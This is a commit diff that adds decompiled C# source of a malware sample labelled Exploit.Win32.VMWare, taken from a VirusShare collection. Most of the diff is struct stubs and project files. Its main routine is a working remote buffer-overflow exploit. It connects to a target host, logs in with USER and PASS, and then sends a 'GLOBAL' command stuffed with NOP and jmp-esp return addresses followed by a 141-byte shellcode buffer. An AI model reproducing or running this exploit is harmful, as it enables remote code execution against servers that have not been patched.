auto-decompiled msil via petikvx

add
2026-06-17 00:09:23 +00:00 · 2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x0e6cb2b2
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 33, Pack = 1)]
+internal struct \u0024ArrayType\u00240x0e6cb2b2
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x1d30cc0a
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 3, Pack = 1)]
+internal struct \u0024ArrayType\u00240x1d30cc0a
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x24ec09a1
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 141, Pack = 1)]
+internal struct \u0024ArrayType\u00240x24ec09a1
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x3a9112db
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 61, Pack = 1)]
+internal struct \u0024ArrayType\u00240x3a9112db
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x4b6a6b8c
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 5, Pack = 1)]
+internal struct \u0024ArrayType\u00240x4b6a6b8c
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x5bb2c15a
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 15, Pack = 1)]
+internal struct \u0024ArrayType\u00240x5bb2c15a
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x5efdd7df
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 65, Pack = 1)]
+internal struct \u0024ArrayType\u00240x5efdd7df
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x6047384f
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 6, Pack = 1)]
+internal struct \u0024ArrayType\u00240x6047384f
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x795c090e
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 7, Pack = 1)]
+internal struct \u0024ArrayType\u00240x795c090e
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x8011bcc8
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 4096, Pack = 1)]
+internal struct \u0024ArrayType\u00240x8011bcc8
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0x8b5292b5
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 4, Pack = 1)]
+internal struct \u0024ArrayType\u00240x8b5292b5
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0xf1cc4cbd
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 49, Pack = 1)]
+internal struct \u0024ArrayType\u00240xf1cc4cbd
+{
+}
@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: $ArrayType$0xfec415c1
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
+internal struct \u0024ArrayType\u00240xfec415c1
+{
+}
@@ -0,0 +1,5 @@
+using System.Reflection;
+using System.Security.Permissions;
+
+[assembly: AssemblyVersion("0.0.0.0")]
+[assembly: PermissionSet(SecurityAction.RequestMinimum, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\n               version=\"1\">\r\n   <IPermission class=\"System.Security.Permissions.SecurityPermission, mscorlib, Version=1.0.3300.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\n                version=\"1\"\r\n                Flags=\"SkipVerification\"/>\r\n</PermissionSet>\r\n")]
@@ -0,0 +1,57 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{5F94B076-9763-47D6-A095-7301B4551DEB}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <AssemblyName>vmware</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualC" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="_003CModule_003E.cs" />
+    <Compile Include="$ArrayType$0x5efdd7df.cs" />
+    <Compile Include="$ArrayType$0xf1cc4cbd.cs" />
+    <Compile Include="$ArrayType$0x0e6cb2b2.cs" />
+    <Compile Include="$ArrayType$0x3a9112db.cs" />
+    <Compile Include="$ArrayType$0x5bb2c15a.cs" />
+    <Compile Include="$ArrayType$0x1d30cc0a.cs" />
+    <Compile Include="$ArrayType$0x6047384f.cs" />
+    <Compile Include="$ArrayType$0xfec415c1.cs" />
+    <Compile Include="$ArrayType$0x4b6a6b8c.cs" />
+    <Compile Include="$ArrayType$0x795c090e.cs" />
+    <Compile Include="WSAData.cs" />
+    <Compile Include="sockaddr_in.cs" />
+    <Compile Include="$ArrayType$0x8011bcc8.cs" />
+    <Compile Include="sockaddr.cs" />
+    <Compile Include="$ArrayType$0x8b5292b5.cs" />
+    <Compile Include="$ArrayType$0x24ec09a1.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "vmware", "Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.csproj", "{5F94B076-9763-47D6-A095-7301B4551DEB}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{5F94B076-9763-47D6-A095-7301B4551DEB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{5F94B076-9763-47D6-A095-7301B4551DEB}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{5F94B076-9763-47D6-A095-7301B4551DEB}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{5F94B076-9763-47D6-A095-7301B4551DEB}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,15 @@
+// Decompiled with JetBrains decompiler
+// Type: WSAData
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[MiscellaneousBits(1)]
+[StructLayout(LayoutKind.Sequential, Size = 400, Pack = 1)]
+internal struct WSAData
+{
+}
@@ -0,0 +1,206 @@
+// Decompiled with JetBrains decompiler
+// Type: <Module>
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using System;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+using System.Security;
+
+internal class \u003CModule\u003E
+{
+  public static \u0024ArrayType\u00240x5efdd7df \u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040;
+  public static \u0024ArrayType\u00240xf1cc4cbd \u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040;
+  public static \u0024ArrayType\u00240x0e6cb2b2 \u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040;
+  public static \u0024ArrayType\u00240x3a9112db \u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040;
+  public static \u0024ArrayType\u00240x5bb2c15a \u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040;
+  public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040;
+  public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040;
+  public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040;
+  public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040;
+  public static \u0024ArrayType\u00240xfec415c1 \u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040;
+  public static \u0024ArrayType\u00240x4b6a6b8c \u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040;
+  public static \u0024ArrayType\u00240x795c090e \u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040;
+  public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP_XP_Eng;
+  public static \u0024ArrayType\u00240x24ec09a1 shellcode;
+  public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP;
+
+  public static unsafe void usage()
+  {
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040, __arglist ());
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040, __arglist ());
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040, __arglist ());
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
+  }
+
+  public static unsafe int main(int argc, sbyte** argv)
+  {
+    if (argc != 6)
+    {
+      \u003CModule\u003E.usage();
+      return 0;
+    }
+    WSAData wsaData;
+    \u003CModule\u003E.WSAStartup((ushort) 514, &wsaData);
+    uint num1 = \u003CModule\u003E.socket(2, 1, 6);
+    sockaddr_in sockaddrIn;
+    // ISSUE: cast to a reference type
+    // ISSUE: explicit reference operation
+    ^(short&) ref sockaddrIn = (short) 2;
+    // ISSUE: cast to a reference type
+    // ISSUE: explicit reference operation
+    ^(short&) ((IntPtr) &sockaddrIn + 2) = (short) \u003CModule\u003E.htons((ushort) \u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 8)));
+    // ISSUE: cast to a reference type
+    // ISSUE: explicit reference operation
+    ^(int&) ((IntPtr) &sockaddrIn + 4) = (int) \u003CModule\u003E.inet_addr((sbyte*) *(int*) ((IntPtr) argv + 4));
+    if (\u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 20)) != 0)
+    {
+      // ISSUE: cast to a reference type
+      // ISSUE: explicit reference operation
+      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
+      // ISSUE: cast to a reference type
+      // ISSUE: explicit reference operation
+      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
+      // ISSUE: cast to a reference type
+      // ISSUE: explicit reference operation
+      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
+      // ISSUE: cast to a reference type
+      // ISSUE: explicit reference operation
+      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
+    }
+    else
+    {
+      // ISSUE: cast to a reference type
+      // ISSUE: explicit reference operation
+      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
+      // ISSUE: cast to a reference type
+      // ISSUE: explicit reference operation
+      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
+      // ISSUE: cast to a reference type
+      // ISSUE: explicit reference operation
+      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
+      // ISSUE: cast to a reference type
+      // ISSUE: explicit reference operation
+      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
+    }
+    if (\u003CModule\u003E.connect(num1, (sockaddr*) &sockaddrIn, 16) == -1)
+    {
+      \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040, __arglist ());
+      return -1;
+    }
+    \u0024ArrayType\u00240x8011bcc8 arrayType0x8011bcc8;
+    // ISSUE: initblk instruction
+    __memset(ref arrayType0x8011bcc8, 0, 4096);
+    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
+    // ISSUE: initblk instruction
+    __memset(ref arrayType0x8011bcc8, 0, 4096);
+    // ISSUE: cpblk instruction
+    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040, 6);
+    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 12));
+    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
+    uint num2 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
+    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num2, 0);
+    // ISSUE: initblk instruction
+    __memset(ref arrayType0x8011bcc8, 0, 4096);
+    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
+    // ISSUE: initblk instruction
+    __memset(ref arrayType0x8011bcc8, 0, 4096);
+    // ISSUE: cpblk instruction
+    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040, 6);
+    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 16));
+    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
+    uint num3 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
+    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num3, 0);
+    // ISSUE: initblk instruction
+    __memset(ref arrayType0x8011bcc8, 0, 4096);
+    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
+    // ISSUE: initblk instruction
+    __memset(ref arrayType0x8011bcc8, 0, 4096);
+    // ISSUE: cpblk instruction
+    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040, 8);
+    int num4 = (int) ((IntPtr) &arrayType0x8011bcc8 + 11);
+    uint num5 = 36;
+    do
+    {
+      // ISSUE: cpblk instruction
+      __memcpy(num4 - 4, ref \u003CModule\u003E.\u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040, 4);
+      // ISSUE: cpblk instruction
+      __memcpy(num4, ref \u003CModule\u003E.Jmp_ESP, 4);
+      num4 += 8;
+      --num5;
+    }
+    while (num5 > 0U);
+    // ISSUE: cast to a reference type
+    // ISSUE: cpblk instruction
+    __memcpy((\u0024ArrayType\u00240x8011bcc8&) ((IntPtr) &arrayType0x8011bcc8 + 295), ref \u003CModule\u003E.shellcode, 141);
+    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
+    uint num6 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
+    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num6, 0);
+    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040, __arglist ());
+    \u003CModule\u003E.closesocket(num1);
+    \u003CModule\u003E.WSACleanup();
+    return 1;
+  }
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe int printf([In] sbyte* obj0, __arglist);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern int WSACleanup();
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern int closesocket([In] uint obj0);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe int send([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe uint strlen([In] sbyte* obj0);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe sbyte* strcat([In] sbyte* obj0, [In] sbyte* obj1);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe int recv([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);
